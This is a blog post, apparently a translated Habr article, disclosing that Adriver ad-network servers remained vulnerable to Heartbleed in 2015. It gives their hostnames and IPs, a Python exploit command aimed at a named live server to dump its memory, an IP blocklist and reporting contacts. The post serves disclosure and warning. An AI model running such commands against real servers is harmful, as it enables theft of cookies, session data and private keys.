Heartbleed and his friends in 2015: how an advertising network endangers site visitors

On the first working day of the new year, I would like to draw the attention of site owners to the ads that they publish. Does your site work on HTTPS, like all advertising scripts? Do you use the latest software versions, only support secure protocols and cipher suites? And the advertising system?

Heartbleed is an error in OpenSSL that allows unauthorized reading of memory on a server up to 64 kilobytes in one request. An attack can be performed infinitely many times. The error was introduced in March 2012, and the vulnerability information was published on April 8, 2014 (9 months ago).

Articles on Habré:
Critical vulnerability in OpenSSL 1.0.1 and 1.0.2-beta
Implications of OpenSSL HeartBleed
What else does Heartbleed threaten a simple user with?
')
During the Christmas holidays, I was engaged in the implementation of HTTPS on a friend’s website. It took several hours to eliminate mixed content (loading HTTP resources on an HTTPS page). When it came to an end, I noticed a browser warning when scrolling down the page:



What, one more? We look console:



See the script:



Everything here is pretty trite: the HTTP script Advertur is registered in the Adriver HTTPS script. But I was interested in another warning:

content.adriver.ru: server does not support RFC 5746, see CVE-2009-3555

This warning indicates that the server does not support secure renegotiation . It was decided to test Adriver on SSL Labs :



All content servers, except the 2nd and 4th, were rated C because of the vulnerability to POODLE against SSL3 . But why did the second and fourth get an F rating? Maybe they support SSL2? Or unsafe reconnection? Maybe they are vulnerable to CVE-2014-0224 , as it was with Habrom itself for half a year (we are not robots)? Or to POODLE vs. TLS , as is often the case with banks and EPS? The list can be continued with support for anonymous cipher suites and other vulnerabilities.

But a terrible thing happened:





2 Adriver servers serving JavaScript are still subject to the most terrible vulnerability in the history of OpenSSL. Server memory contains referrers, IP addresses, cookies, user agents, and so on.

217.16.28.104 - masterh4.adriver.ru
217.16.18.206 - masterh5.adriver.ru

What is it fraught with? The servers have a security certificate installed that is valid for all Adriver subdomains until the end of February 2016. Possession of the private key of the certificate obtained from the server's memory will allow imperceptibly replacing JavaScript in browsers of visitors to sites with an installed Adriver advertisement (Habr falls into this category).

Exploiting a vulnerability using a Python script :

python heartbleed.py masterh4.adriver.ru -n 100 -a dump.txt

This command will send 100 heartbeat messages to masterh4.adriver.ru and store the received data in dump.txt.

Video:



Conclusions and precautions:
1. Installing advertising and tracking services, test their security. Do not leave the site and its visitors vulnerable.
2. Consider how relevant advertising and tracking on HTTPS sites. In no case do not install third-party scripts on the order processing pages, as it is done, for example, by Yves Rocher.



Guaranteed!



3. Site visitors should always block ads and trackers. A more radical method is blocking connections to all Adriver servers.

83.222.14.88
217.16.28.104
217.16.18.207
217.16.18.206
77.109.110.134
217.16.18.163
217.16.18.213
77.109.85.18
217.16.18.214
83.222.14.222
81.222.128.98
195.209.111.3
195.209.111.2
81.222.128.22
81.222.128.23

Report a vulnerability:

Adriver

support@adriver.ru

Moscow, Pokrovsky Boulevard, 3, building 1B
(495) 981-34-00

St. Petersburg, st. Savushkina, 83, Bldg. 3, letter A, (business center "Antares"), 6th floor
(812) 438-10-74

Masterhost

Multichannel phones
(495) 772-97-20
(495) 956-97-20
Free phone for regions
8-800-200-97-20

Technical support support@masterhost.ru
Information about found vulnerabilities by security@masterhost.ru

Thawte (Adriver certificate publisher)

Chat - www.thawte.com/chat/chat_intro.html
The list of phones - www.thawte.com/about/contact/index.html (Certificate Order Processing)

And may all your wishes come true!